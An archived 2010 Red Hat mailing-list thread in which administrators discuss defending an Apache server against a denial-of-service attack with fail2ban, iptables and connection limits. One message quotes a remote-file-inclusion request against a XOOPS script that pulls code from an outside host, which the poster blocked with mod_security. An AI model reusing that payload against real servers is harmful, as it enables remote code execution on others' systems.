VS: Re: how to protect an apache from a DOS Attack

From: "Tatu Salin " <tatusalin@xxxxxxxxxxx>
Date: Mon, 12 Apr 2010 19:23:53 +0000

There should be possibility limit connections at the same time. For example you should be able limit conneçtions how many connections can be taken at the same time on that specific web server from same IP-address. There should be sections on httpd.conf file, which you could be used to limit connections to the same web server at the same time. Please check that configuration.

-----Original Message-----
From: ESGLinux
Sent: 4/12/2010 5:16:49 PM
To: General Red Hat Linux discussion list
Subject: Re: how to protect an apache from a DOS Attack
Hi again

I have experimented with mod_security to ban access to urls like this:
/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=
http://www.hongkongtravel.co.kr/you4/data/byz9991.txt???

but I don?t know if there is a way to use it to limit the number of access
from a ip in period of time,

anyone knows?

ESG

2010/4/12 <m.roth@xxxxxxxxx>

ESG wrote:

I have an apache web server and I having a DOS Attack. Which is the best
way to protect my webserver from it. ?

What I do now is when I detect the problem I use an iptable rule to ban
the ip, but I want to do it automatically without manual intervention,

Any idea or suggestion?

fail2ban

mark

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list
--
redhat-list mailing list
unsubscribe mailto:redhat-list-request@xxxxxxxxxx?subject=unsubscribe
https://www.redhat.com/mailman/listinfo/redhat-list

Prev by Date: Re: VS: Unzipping problem | write error (disk full?)
Next by Date: Re: SELinux dropping PHP Connection
Previous by thread: how to protect an apache from a DOS Attack
Next by thread: unable to find path to be RHCA :(
Index(es):
- Date
- Thread

Relevant Pages

Re: protecting administrative page
... I have written a website contaning a few pages available ... I dislike such solutions because they add Apache in the chain of needed software to let the application function. ... adding logic to to the webserver to protect a directory is always an extra layer. ... However once you go PHP you might as well put a php wrapper round that as well. ...
(comp.lang.php)
Re: protecting administrative page
... Jerry Stuckle wrote: ... I have written a website contaning a few pages available ... I dislike such solutions because they add Apache in the chain of needed software to let the application function. ... adding logic to to the webserver to protect a directory is always an extra layer. ...
(comp.lang.php)
Re: protecting administrative page
... I dislike such solutions because they add Apache in the chain of needed software to let the application function. ... I wonder how many web sites like the OP is writing do not run on LAMP, ... adding logic to to the webserver to protect a directory is always an extra layer. ... "There are two ways of constructing a software design: One way is to make it so simple that there are obviously no deficiencies, and the other way is to make it so complicated that there are no obvious deficiencies. ...
(comp.lang.php)
Re: Apache Security
... > to protect the real system better. ... I have used both chroot and non-chroot deployments of apache on ... concentrating security ... serveral update scripts. ...
(comp.os.linux.security)